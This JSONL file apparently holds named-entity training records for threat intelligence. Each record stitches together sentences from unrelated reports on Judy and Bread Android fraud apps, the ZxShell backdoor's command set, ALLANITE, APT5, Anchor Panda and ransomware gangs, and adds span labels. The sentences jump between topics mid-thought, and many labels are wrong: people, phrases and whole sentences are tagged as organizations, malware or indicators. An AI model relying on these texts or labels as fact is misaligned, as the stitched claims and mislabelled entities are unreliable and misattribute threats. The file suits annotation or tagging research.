{"text": "After Check Point notified Google about this threat , the apps were swiftly removed from the Play store . During the same time period , we also observed the actor using the Browser Exploitation Framework ( BeEF ) to compromise victim hosts and download Cobalt Strike . There are 3 types of lists recognized by ZxShell : plain ip addresses , HTTP and FTP addresses . Cisco Secure Firewall ( formerly Next - Generation Firewall and Firepower NGFW ) appliances such as Threat Defense Virtual , Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat .", "spans": [{"start": 6, "end": 17, "label": "Organization"}, {"start": 27, "end": 33, "label": "Organization"}, {"start": 93, "end": 103, "label": "System"}, {"start": 253, "end": 266, "label": "System"}, {"start": 310, "end": 317, "label": "Malware"}, {"start": 341, "end": 345, "label": "Indicator"}, {"start": 350, "end": 353, "label": "Indicator"}, {"start": 366, "end": 387, "label": "System"}, {"start": 399, "end": 444, "label": "System"}, {"start": 466, "end": 488, "label": "System"}]}
{"text": "How Judy operates : To bypass Bouncer , Google Play \u2019 s protection , the hackers create a seemingly benign bridgehead app , meant to establish connection to the victim \u2019 s device , and insert it into the app store . In this campaign , the attackers experimented with publicly available tooling for attack operations . If the list does not contain any item , or if the verification has failed , the ZxShell sample tries to connect to a hardcoded host Budworm is a longrunning APT group that is believed to have been active since at least 2013 .", "spans": [{"start": 4, "end": 8, "label": "Malware"}, {"start": 30, "end": 37, "label": "System"}, {"start": 40, "end": 51, "label": "System"}, {"start": 267, "end": 293, "label": "System"}, {"start": 398, "end": 405, "label": "Malware"}, {"start": 450, "end": 457, "label": "Organization"}, {"start": 475, "end": 484, "label": "Organization"}]}
{"text": "Once a user downloads a malicious app , it silently registers receivers which establish a connection with the C & C server . The primary goal of these attacks was likely to find code-signing certificates for signing future malware . with the goal of retrieving a new updated list . Danbot , Shark , and Milan use both DNS and HTTPS for C2 communications , while Marlin uses the OneDrive API for C2 communications .", "spans": [{"start": 282, "end": 288, "label": "Malware"}, {"start": 291, "end": 296, "label": "Malware"}, {"start": 303, "end": 308, "label": "Malware"}, {"start": 318, "end": 321, "label": "System"}, {"start": 326, "end": 331, "label": "System"}, {"start": 336, "end": 353, "label": "System"}, {"start": 362, "end": 368, "label": "Malware"}, {"start": 378, "end": 390, "label": "System"}, {"start": 395, "end": 412, "label": "System"}]}
{"text": "The server replies with the actual malicious payload , which includes JavaScript code , a user-agent string and URLs controlled by the malware author . The Chinese intelligence apparatus has been reported on under many names , including Winnti , PassCV , APT17 , Axiom , LEAD , BARIUM , Wicked Panda , and GREF . Otherwise , ZxShell tries to connect to the first item of the list . This allows application control solutions to block unknown threats .", "spans": [{"start": 325, "end": 332, "label": "Malware"}]}
{"text": "The malware opens the URLs using the user agent that imitates a PC browser in a hidden webpage and receives a redirection to another website . The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221.216.0.0/13 . If ZxShell successfully connects to the remote host , the function DoHandshake is called . As 2021 ends , one critical theme remains constant within the world of enterprise security ransomware attacks are continuing to rise , yearoveryear , across private and public entities .", "spans": [{"start": 273, "end": 280, "label": "Malware"}, {"start": 518, "end": 545, "label": "Organization"}]}
{"text": "Once the targeted website is launched , the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security ( DHS ) . This function implements the initial handshake which consists of exchanging 16 bytes , 0x00001985 and 0x00000425, Iranian officials state the delegations agreed that good progress was made during the seventh round that ended 10 days earlier , and there is now a suitable framework to take the talks forward .", "spans": [{"start": 117, "end": 127, "label": "System"}, {"start": 217, "end": 248, "label": "Organization"}, {"start": 251, "end": 254, "label": "Organization"}, {"start": 373, "end": 390, "label": "Organization"}]}
{"text": "Upon clicking the ads , the malware author receives payment from the website developer , which pays for the illegitimate clicks and traffic . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security . with the server . This is analogous to antivirus solutions using known virus signatures to determine if a computing interaction suggests virus installation or malware delivery across the network .", "spans": [{"start": 214, "end": 245, "label": "Organization"}]}
{"text": "The JavaScript code locates the targeted ads by searching for iframes which contain ads from Google ads infrastructure , as shown in the image below : The fraudulent clicks generate a large revenue for the perpetrators , especially since the malware reached a presumably wide spread . ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems . The function GetLocalPcDescrStr is used to compose a large string that contains system information of the target workstation . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": [{"start": 93, "end": 103, "label": "System"}, {"start": 328, "end": 348, "label": "System"}, {"start": 638, "end": 649, "label": "Organization"}, {"start": 786, "end": 802, "label": "System"}, {"start": 829, "end": 839, "label": "Organization"}, {"start": 856, "end": 869, "label": "Organization"}]}
{"text": "Who is behind Judy ? In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly ( which Dragos associates with DYMALLOY ) . The string is sent to the remote host and the response is checked to see if the first byte of the response is 0xF4, an arbitrary byte . The form also contains legitimate macro code modified by the attacker to call malicious subroutines .", "spans": [{"start": 14, "end": 18, "label": "Malware"}, {"start": 41, "end": 44, "label": "Organization"}, {"start": 131, "end": 139, "label": "Organization"}, {"start": 164, "end": 170, "label": "Organization"}]}
{"text": "The malicious apps are all developed by a Korean company named Kiniwini , registered on Google Play as ENISTUDIO corp . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group . If it is , the botnet connection I/O procedure is called through the MainConnectionIo function . The cyber espionage campaign has been attributed to Iranian APT MuddyWater aka Static Kitten and is reported to be actively ongoing , targeting government agencies , as well as entities in the sectors of tourism and academia , within countries including the UAE , Saudi Arabia , and Israel .", "spans": [{"start": 63, "end": 71, "label": "Organization"}, {"start": 88, "end": 99, "label": "System"}, {"start": 103, "end": 117, "label": "Organization"}, {"start": 140, "end": 143, "label": "Organization"}, {"start": 247, "end": 253, "label": "Malware"}, {"start": 333, "end": 357, "label": "Organization"}, {"start": 381, "end": 403, "label": "Organization"}, {"start": 408, "end": 421, "label": "Organization"}, {"start": 473, "end": 492, "label": "Organization"}, {"start": 506, "end": 553, "label": "Organization"}]}
{"text": "The company develops mobile apps for both Android and iOS platforms . We assess with high confidence that the attackers discussed here are associated with the Chinese state intelligence apparatus . Otherwise , the ZxShell code closes the socket used and sleeps for 30 seconds . Maybe the text in the email jokes about the trip you took last week and how you came back sunburnt .", "spans": [{"start": 42, "end": 49, "label": "System"}, {"start": 54, "end": 57, "label": "System"}, {"start": 214, "end": 221, "label": "Malware"}]}
{"text": "It is quite unusual to find an actual organization behind mobile malware , as most of them are developed by purely malicious actors . ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities . It will then retry the connection with the next remote host , if there is one . Sandworm \u2019s Threat Activity Reveals Insights into Russia \u2019s Offensive Cyber Capabilities", "spans": [{"start": 344, "end": 371, "label": "Organization"}, {"start": 394, "end": 432, "label": "Organization"}]}
{"text": "It is important to note that the activity conducted by the malware is not borderline advertising , but definitely an illegitimate use of the users \u2019 mobile devices for generating fraudulent clicks , benefiting the attackers . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly . It is noteworthy that this function includes the code to set the ZxShell node as a server : if one of the hardcoded boolean value is set to 1, a listening socket is created . After analyzing code from a command and control ( C2 ) server used in the global cyber - espionage campaign dubbed ' Sharpshooter ' , security researchers found more evidence linking it to North Korea 's Lazarus threat actor .", "spans": [{"start": 246, "end": 249, "label": "Organization"}, {"start": 336, "end": 344, "label": "Organization"}, {"start": 428, "end": 435, "label": "Malware"}, {"start": 566, "end": 599, "label": "System"}, {"start": 608, "end": 645, "label": "Organization"}, {"start": 655, "end": 667, "label": "Organization"}, {"start": 672, "end": 692, "label": "Organization"}, {"start": 727, "end": 749, "label": "Organization"}]}
{"text": "In addition to the clicking activity , Judy displays a large amount of advertisements , which in some cases leave users with no option but clicking on the ad itself . Public disclosure by third-parties , including the DHS , associate ALLANITE operations with Russian strategic interests . The code waits for an incoming connection . Module ID Internal Name 1 module_ipc 2 module_monitor 3 module_apu 4 module_event 5 module_net", "spans": [{"start": 39, "end": 43, "label": "Malware"}, {"start": 218, "end": 221, "label": "Organization"}, {"start": 333, "end": 427, "label": "Malware"}]}
{"text": "Although most apps have positive ratings , some of the users have noticed and reported Judy \u2019 s suspicious activities , as seen in the images below : As seen in previous malware , such as DressCode , a high reputation does not necessarily indicate that the app is safe for use . ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system . When the connection is established a new thread is spawned that starts with the MainConnectionIo function . The leaked Biderman emails show that Harrison made good on his threats , and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti - Semitic language .", "spans": [{"start": 87, "end": 91, "label": "Malware"}, {"start": 188, "end": 197, "label": "Malware"}, {"start": 519, "end": 541, "label": "Indicator"}, {"start": 552, "end": 560, "label": "Organization"}, {"start": 625, "end": 633, "label": "Organization"}, {"start": 650, "end": 658, "label": "Organization"}, {"start": 669, "end": 694, "label": "Organization"}]}
{"text": "Hackers can hide their apps \u2019 real intentions or even manipulate users into leaving positive ratings , in some cases unknowingly . Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation . The MainConnectionIo function checks if the Windows Firewall is enabled , sets the Tcp Keep Alive value and Non-blocking mode connection options and receives data from the remote host through the ReceiveCommandData function . \u2022 Other actors merged into this group : 0 Sign up for free Mandiant Threat Intelligence for detailed reports about UNC groups including :", "spans": [{"start": 131, "end": 137, "label": "Organization"}, {"start": 329, "end": 336, "label": "System"}, {"start": 337, "end": 345, "label": "System"}, {"start": 368, "end": 382, "label": "System"}, {"start": 626, "end": 636, "label": "Organization"}]}
{"text": "Users can not rely on the official app stores for their safety , and should implement advanced security protections capable of detecting and blocking zero-day mobile malware . However , full details on ALLANITE and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView . Then the connection is retried . Figure 2 : Historical Russia - nexus activity impacting OT", "spans": [{"start": 318, "end": 334, "label": "Organization"}, {"start": 392, "end": 415, "label": "Organization"}, {"start": 426, "end": 428, "label": "System"}]}
{"text": "PHA Family Highlights : Bread ( and Friends ) January 9 , 2020 In this edition of our PHA Family Highlights series we introduce Bread , a large-scale billing fraud family . In addition to maritime operations in this region , Anchor Panda also heavily targeted western companies in the US , Germany , Sweden , the UK , and Australia , and other countries involved in maritime satellite systems , aerospace companies , and defense contractors . The received command is then processed by the ZxShell function with the ProcessCommand function . Since early 2023 , we have seen several new Yashma strains emerge , including ANXZ , Sirattacker , and Shadow Men Team .", "spans": [{"start": 24, "end": 29, "label": "Malware"}, {"start": 128, "end": 133, "label": "Malware"}, {"start": 395, "end": 414, "label": "Organization"}, {"start": 421, "end": 440, "label": "Organization"}, {"start": 489, "end": 496, "label": "Malware"}, {"start": 619, "end": 623, "label": "Organization"}, {"start": 626, "end": 637, "label": "Organization"}, {"start": 644, "end": 659, "label": "Organization"}]}
{"text": "We first started tracking Bread ( also known as Joker ) in early 2017 , identifying apps designed solely for SMS fraud . A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology . The command processing function starts by substituting the main module name and path in the hosting process PEB , with the one of the default internet browser . The attacks that Anonymous Sudan has claimed in support of KillNet , both before and after it officially joined the collective , have broadened the geographic scope of its targeting to include entities elsewhere in Europe and the U.S. ; it has since continued to expand the scope of its targeting further afield to include countries such as Israel and Ethiopia .", "spans": [{"start": 26, "end": 31, "label": "Malware"}, {"start": 48, "end": 53, "label": "Malware"}, {"start": 199, "end": 214, "label": "Organization"}, {"start": 471, "end": 478, "label": "Organization"}]}
{"text": "As the Play Store has introduced new policies and Google Play Protect has scaled defenses , Bread apps were forced to continually iterate to search for gaps . PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy . This trick renders identification by firewall more cumbersome . In general terms , spyware is software that can be installed on a device and used to monitor activity and/or capture potentially sensitive data .", "spans": [{"start": 7, "end": 17, "label": "System"}, {"start": 50, "end": 69, "label": "System"}, {"start": 92, "end": 97, "label": "Malware"}, {"start": 168, "end": 180, "label": "Organization"}, {"start": 202, "end": 213, "label": "Organization"}, {"start": 461, "end": 469, "label": "System"}, {"start": 507, "end": 514, "label": "Malware"}, {"start": 518, "end": 631, "label": "Malware"}]}
{"text": "They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected . ALLANITE operations continue and intelligence indicates activity since at least May 2017 . A host firewall Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": [{"start": 253, "end": 269, "label": "System"}, {"start": 309, "end": 325, "label": "System"}, {"start": 353, "end": 364, "label": "System"}, {"start": 415, "end": 428, "label": "Organization"}]}
{"text": "Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere . APT Anchor Panda is a Chinese threat actor group who target maritime operations . S-TOOLwill recognize the outgoing connection as originated by the browser instead of the ZxShell service host process . Attackers send these emails to multiple accounts , hoping that someone will believe the story , and pay up .", "spans": [{"start": 85, "end": 95, "label": "System"}, {"start": 307, "end": 314, "label": "Malware"}, {"start": 338, "end": 386, "label": "Indicator"}]}
{"text": "In this post , we show how Google Play Protect has defended against a well organized , persistent attacker and share examples of their techniques . According to cyber security researchers , Anchor Panda , who work directly for the Chinese PLA Navy , likely remains active . The browser process always performs outgoing connections and the firewall should n\u2019t block them . Whoever hacked Ashley Madison had access to all employee emails , but they only released Biderman \u2019s messages \u2014 three years worth .", "spans": [{"start": 27, "end": 46, "label": "System"}, {"start": 339, "end": 347, "label": "System"}, {"start": 387, "end": 401, "label": "Organization"}, {"start": 461, "end": 472, "label": "Organization"}]}
{"text": "TL ; DR Google Play Protect detected and removed 1.7k unique Bread apps from the Play Store before ever being downloaded by users Bread apps originally performed SMS fraud , but have largely abandoned this for WAP billing following the introduction of new Play policies restricting use of the SEND_SMS permission and increased coverage by Google Play Protect More information on stats and relative impact is available in the Android Security 2018 Year in Review report BILLING FRAUD Bread apps typically fall into two categories : SMS fraud ( older versions ) and toll fraud ( newer versions ) . Dragos does not corroborate nor conduct political attribution to threat activity . The command processing is straightforward . Subsequently , KillNet claimed to have compromised NATO \u2019s training site , Joint Advanced Distributed Learning , and published dozens of purportedly leaked images on its channels .", "spans": [{"start": 8, "end": 27, "label": "System"}, {"start": 61, "end": 66, "label": "Malware"}, {"start": 81, "end": 91, "label": "System"}, {"start": 130, "end": 135, "label": "Malware"}, {"start": 256, "end": 260, "label": "System"}, {"start": 339, "end": 358, "label": "System"}, {"start": 425, "end": 432, "label": "System"}, {"start": 483, "end": 488, "label": "Malware"}, {"start": 596, "end": 602, "label": "Organization"}, {"start": 774, "end": 795, "label": "System"}]}
{"text": "Both of these types of fraud take advantage of mobile billing techniques involving the user \u2019 s carrier . In the past they used Adobe Gh0st , Poison Ivy and Torn RAT malware as their primary attack vector is sphere phishing . Here is the list of common commands : Methods for doing that include built - in functionality of malware or by using utilities present on the system .", "spans": [{"start": 128, "end": 139, "label": "System"}, {"start": 142, "end": 152, "label": "System"}, {"start": 157, "end": 173, "label": "System"}, {"start": 323, "end": 330, "label": "Malware"}]}
{"text": "SMS Billing Carriers may partner with vendors to allow users to pay for services by SMS . Their targets are marine companies that operate in and around the South China Sea , an area of much Chinese interest . Help / ? Get help . Mandiant identified novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware , which we track as COSMICENERGY , uploaded to a public malware scanning utility in December 2021 by a submitter in Russia .", "spans": [{"start": 108, "end": 124, "label": "Organization"}, {"start": 229, "end": 237, "label": "Organization"}, {"start": 249, "end": 336, "label": "Malware"}, {"start": 357, "end": 369, "label": "Malware"}, {"start": 386, "end": 417, "label": "System"}]}
{"text": "The user simply needs to text a prescribed keyword to a prescribed number ( shortcode ) . As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities . Exit / Quit Exit and shut down the botnet client . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": [{"start": 234, "end": 246, "label": "Organization"}, {"start": 338, "end": 358, "label": "Organization"}, {"start": 464, "end": 482, "label": "System"}]}
{"text": "A charge is then added to the user \u2019 s bill with their mobile service provider . The cyber-espionage campaign has labelled the group Advanced Persistent Threat ( APT ) 40 or , titled , Periscope . SysInfo Get target System information . We were able to find additional links between Hack520 \u2019s \u201c Pig network \u201d and the Winnti group \u2019s activities .", "spans": [{"start": 133, "end": 152, "label": "Organization"}, {"start": 153, "end": 170, "label": "Organization"}, {"start": 185, "end": 194, "label": "Organization"}, {"start": 283, "end": 309, "label": "Organization"}, {"start": 318, "end": 330, "label": "Organization"}]}
{"text": "Toll Billing Carriers may also provide payment endpoints over a web page . The group has been active since at least January 2013 . SYNFlood Perform a SYN attack on a host . Many threat groups successfully leverage aging vulnerabilities , which , if they had been patched by their victims , may have prevented an attack .", "spans": [{"start": 178, "end": 191, "label": "Organization"}, {"start": 214, "end": 243, "label": "Vulnerability"}]}
{"text": "The user visits the URL to complete the payment and enters their phone number . The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states . Ps Process service Unix command implementation . What \u2019s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": [{"start": 108, "end": 118, "label": "Organization"}, {"start": 274, "end": 278, "label": "System"}, {"start": 348, "end": 354, "label": "System"}]}
{"text": "Verification that the request is coming from the user \u2019 s device is completed using two possible methods : The user connects to the site over mobile data , not WiFi ( so the service provider directly handles the connection and can validate the phone number ) ; or The user must retrieve a code sent to them via SMS and enter it into the web page ( thereby proving access to the provided phone number ) . The main targets seem to be US companies in engineering , transport and defense , although it has targeted other organizations around the world . CleanEvent Clear System Event log . By using LotL techniques , the actor likely decreased the time and resources required to conduct its cyber physical attack .", "spans": [{"start": 448, "end": 459, "label": "Organization"}, {"start": 462, "end": 471, "label": "Organization"}, {"start": 476, "end": 483, "label": "Organization"}]}
{"text": "Fraud Both of the billing methods detailed above provide device verification , but not user verification . The times of day the group is active also suggests that it is based near Beijing and the group has reportedly used malware that has been observed in other Chinese operations , indicating some level of collaboration . FindPass Find login account password . Although this wave did not use any zero day exploits , it relied on steganography and NTFS alternate data streams to complicate detection .", "spans": []}
{"text": "The carrier can determine that the request originates from the user \u2019 s device , but does not require any interaction from the user that can not be automated . Periscope 's activity has previously been suspected of being linked to China , but now researchers believe their evidence links the operation to the Chinese state . FileTime Get time information about a file . While there may be other groups they want to target also , they tend to be more persistent .", "spans": []}
{"text": "Malware authors use injected clicks , custom HTML parsers and SMS receivers to automate the billing process without requiring any interaction from the user . APT40 is described as a moderately sophisticated cyber-espionage group which combines access to significant development resources with the ability to leverage publicly available tools . FindDialPass List all the dial-up accounts and passwords . Although attacks on education have been a staple of the ransomware ecosystem for years , Vice Society appears to have specialised in delivering misery to schools , colleges , and universities in a highly unusual way .", "spans": [{"start": 158, "end": 163, "label": "Organization"}, {"start": 317, "end": 341, "label": "System"}, {"start": 423, "end": 432, "label": "Organization"}, {"start": 459, "end": 469, "label": "Malware"}, {"start": 492, "end": 504, "label": "Organization"}, {"start": 557, "end": 564, "label": "Organization"}, {"start": 567, "end": 575, "label": "Organization"}, {"start": 582, "end": 594, "label": "Organization"}]}
{"text": "STRING & DATA OBFUSCATION Bread apps have used many innovative and classic techniques to hide strings from analysis engines . Anchor Panda uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities . User Account Management System . While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": [{"start": 308, "end": 336, "label": "System"}, {"start": 471, "end": 559, "label": "Indicator"}]}
{"text": "Here are some highlights . Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network . TransFile Transfer file in or from remote host . Software developers can use coded certificates to digitally sign their software , which means any code with that signature becomes a trusted source .", "spans": [{"start": 67, "end": 72, "label": "Organization"}, {"start": 183, "end": 199, "label": "System"}, {"start": 300, "end": 319, "label": "Organization"}]}
{"text": "Standard Encryption Frequently , Bread apps take advantage of standard crypto libraries in ` java.util.crypto ` . The group uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities . Execute Run a program in the remote host . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": [{"start": 93, "end": 109, "label": "Indicator"}, {"start": 293, "end": 321, "label": "System"}, {"start": 367, "end": 376, "label": "Organization"}, {"start": 438, "end": 464, "label": "Organization"}, {"start": 467, "end": 483, "label": "Organization"}, {"start": 488, "end": 499, "label": "Organization"}, {"start": 513, "end": 586, "label": "Organization"}]}
{"text": "We have discovered apps using AES , Blowfish , and DES as well as combinations of these to encrypt their strings . More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors . SC Service control command , implemented as the Windows one . Our initial investigation on the domains registered by Hack520 revealed that similar domains ( listed below ) were registered by another profile .", "spans": [{"start": 278, "end": 285, "label": "System"}, {"start": 347, "end": 354, "label": "Organization"}]}
{"text": "Custom Encryption Other variants have used custom-implemented encryption algorithms . APT5 has been active since at least 2007 . CA Clone user account . That 's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware .", "spans": [{"start": 86, "end": 90, "label": "Organization"}, {"start": 193, "end": 202, "label": "Malware"}, {"start": 270, "end": 286, "label": "Malware"}]}
{"text": "Some common techniques include : basic XOR encryption , nested XOR and custom key-derivation methods . APT5 has targeted or breached organizations across multiple industries , but its focus appears to be on telecommunications and technology companies , especially information about satellite communications . RunAs Create new process as another User or Process context . In a modern ransomware attack the target is an entire organisation , not just one or two computers .", "spans": [{"start": 103, "end": 107, "label": "Organization"}, {"start": 207, "end": 225, "label": "Organization"}, {"start": 230, "end": 250, "label": "Organization"}, {"start": 282, "end": 306, "label": "Organization"}, {"start": 418, "end": 469, "label": "Organization"}]}
{"text": "Some variants have gone so far as to use a different key for the strings of each class . APT5 targeted the network of an electronics firm that sells products for both industrial and military applications . TermSvc Terminal service configuration ( working on Win Xp/2003 ) . None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": [{"start": 89, "end": 93, "label": "Organization"}, {"start": 121, "end": 137, "label": "Organization"}, {"start": 167, "end": 177, "label": "Organization"}, {"start": 182, "end": 190, "label": "Organization"}, {"start": 258, "end": 269, "label": "System"}]}
{"text": "Split Strings Encrypted strings can be a signal that the code is trying to hide something . The group subsequently stole communications related to the firm 's business relationship with a national military , including inventories and memoranda about specific products they provided . GetCMD Remote Shell . June also witnessed a staggering increase in attacks from relatively new gangs such as Akira ( 26 ) and 8Base ( 41 ) , enough to propel both of them into the top five \u2014 a designation usually reserved for more familiar names like ALPHV , who was conspicuously silent in June .", "spans": [{"start": 121, "end": 135, "label": "Organization"}, {"start": 197, "end": 205, "label": "Organization"}, {"start": 393, "end": 398, "label": "Organization"}, {"start": 410, "end": 415, "label": "Organization"}, {"start": 535, "end": 540, "label": "Organization"}]}
{"text": "Bread has used a few tricks to keep strings in plaintext while preventing basic string matching . In one case in late 2014 , APT5 breached the network of an international telecommunications company . Shutdown Logout , shutdown or restart the target system . Check the flag T as indicator if single stepping .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 157, "end": 197, "label": "Organization"}, {"start": 268, "end": 306, "label": "Indicator"}]}
{"text": "Going one step further , these substrings are sometimes scattered throughout the code , retrieved from static variables and method calls . The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies . ZXARPS Spoofing , redirection , packet capture . The U.S. Government has developed new mechanisms to help Ukraine identify cyber threats and recover from cyber incidents .", "spans": [{"start": 283, "end": 311, "label": "Organization"}, {"start": 367, "end": 382, "label": "Organization"}]}
{"text": "Various versions may also change the index of the split ( e.g . APT5 also targeted the networks of some of Southeast Asia 's major telecommunications providers with Leouncia malware . ZXNC Run ZXNC v1.1 \u2013 a simple telnet client . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": [{"start": 131, "end": 159, "label": "Organization"}, {"start": 165, "end": 181, "label": "System"}, {"start": 395, "end": 425, "label": "Vulnerability"}]}
{"text": "\u201c .clic \u201d and \u201c k ( ) ; \u201d ) . We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems . ZXHttpProxy Run a HTTP proxy server on the workstation . It is still unclear whether its authors have any links to known cybercrime organizations .", "spans": [{"start": 287, "end": 294, "label": "Organization"}, {"start": 319, "end": 343, "label": "Organization"}]}
{"text": "Delimiters Another technique to obfuscate unencrypted strings uses repeated delimiters . The FBI said the \" group of malicious cyber actors \" ( known as APT6 or 1.php ) used dedicated top-level domains in conjunction with the command and control servers to deliver \" customized malicious software \" to government computer systems . ZXSockProxy Run a Sock 4 & 5 Proxy server . Learn How ThreatConnect Can Help Protect Email From Phishing and BEC Attacks", "spans": [{"start": 93, "end": 96, "label": "Organization"}, {"start": 108, "end": 139, "label": "Organization"}, {"start": 153, "end": 157, "label": "Organization"}, {"start": 161, "end": 166, "label": "Organization"}, {"start": 267, "end": 296, "label": "System"}, {"start": 386, "end": 399, "label": "System"}]}
{"text": "A short , constant string of characters is inserted at strategic points to break up keywords : At runtime , the delimiter is removed before using the string : API OBFUSCATION SMS and toll fraud generally requires a few basic behaviors ( for example , disabling WiFi or accessing SMS ) , which are accessible by a handful of APIs . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government . ZXHttpServer Run a custom HTTP server . In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": [{"start": 331, "end": 337, "label": "Organization"}, {"start": 426, "end": 456, "label": "Organization"}, {"start": 459, "end": 477, "label": "Organization"}, {"start": 493, "end": 510, "label": "Organization"}, {"start": 522, "end": 540, "label": "Organization"}, {"start": 569, "end": 573, "label": "Indicator"}]}
{"text": "Given that there are a limited number of behaviors required to identify billing fraud , Bread apps have had to try a wide variety of techniques to mask usage of these APIs . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks . PortScan Run TCP Port MultiScanner v1.0 . Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": [{"start": 88, "end": 93, "label": "Malware"}, {"start": 174, "end": 194, "label": "Organization"}, {"start": 321, "end": 324, "label": "Indicator"}, {"start": 369, "end": 374, "label": "Organization"}, {"start": 398, "end": 416, "label": "Indicator"}, {"start": 421, "end": 431, "label": "Indicator"}, {"start": 448, "end": 469, "label": "Indicator"}]}
{"text": "Reflection Most methods for hiding API usage tend to use Java reflection in some way . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file . KeyLog Capture or record the remote computer \u2019s keystrokes . The code contains the next stage stored as hexadecimal encoded strings and is split into multiple strings so that an antivirus scan would not detect the content as potentially malicious .", "spans": [{"start": 100, "end": 106, "label": "Organization"}, {"start": 109, "end": 113, "label": "Organization"}, {"start": 169, "end": 172, "label": "System"}, {"start": 177, "end": 180, "label": "System"}, {"start": 257, "end": 265, "label": "Malware"}, {"start": 329, "end": 399, "label": "Malware"}, {"start": 404, "end": 434, "label": "Malware"}]}
{"text": "In some samples , Bread has simply directly called the Reflect API on strings decrypted at runtime . Nearly a month later , security experts are now shining a bright light on the alert and the mysterious group behind the attack . The implementation is a userland keylogger that polls the keymap with each keystroke . Notably , the Telegram channel in which actors claiming to be from REvil claimed links with KillNet had been created only days before the operation began on June 15 , 2023 .", "spans": [{"start": 18, "end": 23, "label": "Malware"}, {"start": 263, "end": 272, "label": "System"}, {"start": 331, "end": 347, "label": "System"}, {"start": 384, "end": 389, "label": "Organization"}]}
{"text": "JNI Bread has also tested our ability to analyze native code . The attacks discussed in this blog are related to an APT campaign commonly referred to as \" th3bug \" , named for the password the actors often use with their Poison Ivy malware . LoadDll Load a DLL into the specified process . This campaign also strays from Infys usual target group of Iranian individuals and entities , with victims of Foudre located in Sweden , the Netherlands , the U.S. , along with others across Europe , Iraq , and India .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 221, "end": 239, "label": "System"}, {"start": 242, "end": 249, "label": "System"}, {"start": 257, "end": 260, "label": "System"}, {"start": 295, "end": 303, "label": "Organization"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 349, "end": 381, "label": "Organization"}, {"start": 400, "end": 406, "label": "Organization"}]}
{"text": "In one sample , no SMS-related code appears in the DEX file , but there is a native method registered . Over the summer they compromised several sites , including a well-known Uyghur website written in that native language . End Terminate ZxShell DLL . In terms of the fallout , it \u2019s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": [{"start": 239, "end": 246, "label": "Malware"}, {"start": 247, "end": 250, "label": "System"}, {"start": 314, "end": 318, "label": "Organization"}, {"start": 351, "end": 361, "label": "Vulnerability"}]}
